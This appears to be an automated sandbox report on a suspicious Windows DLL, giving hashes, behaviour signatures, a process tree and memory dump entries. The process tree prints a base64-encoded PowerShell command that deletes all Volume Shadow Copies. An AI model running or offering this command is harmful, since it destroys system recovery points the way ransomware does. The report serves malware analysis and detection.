Analysis

  • max time kernel
    118s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    30-01-2022 08:03

General

  • Target

    0f6e6df2cebc11470dae45c4768b1e2905e011678b2b06bc264cc567fb6251df.dll

  • Size

    116KB

  • MD5

    1c8928e074be67385a44e301df836133

  • SHA1

    954ac2ce6805cfc93006fef5f0562b7475883b75

  • SHA256

    0f6e6df2cebc11470dae45c4768b1e2905e011678b2b06bc264cc567fb6251df

  • SHA512

    b991d95a37e0bce8ddfd54032cf61ff8f6c592c74f02e03bbc837f094ea1da90f3b01fe4b774f48bbaa725b6e86b15a2d42cf7031ceb998838bd1d3aa7cbadb3

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\0f6e6df2cebc11470dae45c4768b1e2905e011678b2b06bc264cc567fb6251df.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1572
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\0f6e6df2cebc11470dae45c4768b1e2905e011678b2b06bc264cc567fb6251df.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1548
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2032
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:396

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1548-55-0x0000000075AB1000-0x0000000075AB3000-memory.dmp
    Filesize

    8KB

  • memory/2032-56-0x000007FEFB5B1000-0x000007FEFB5B3000-memory.dmp
    Filesize

    8KB

  • memory/2032-58-0x0000000002680000-0x0000000002682000-memory.dmp
    Filesize

    8KB

  • memory/2032-59-0x0000000002682000-0x0000000002684000-memory.dmp
    Filesize

    8KB

  • memory/2032-60-0x0000000002684000-0x0000000002687000-memory.dmp
    Filesize

    12KB

  • memory/2032-57-0x000007FEF2810000-0x000007FEF336D000-memory.dmp
    Filesize

    11.4MB

  • memory/2032-61-0x000000001B850000-0x000000001BB4F000-memory.dmp
    Filesize

    3.0MB

  • memory/2032-62-0x000000000268B000-0x00000000026AA000-memory.dmp
    Filesize

    124KB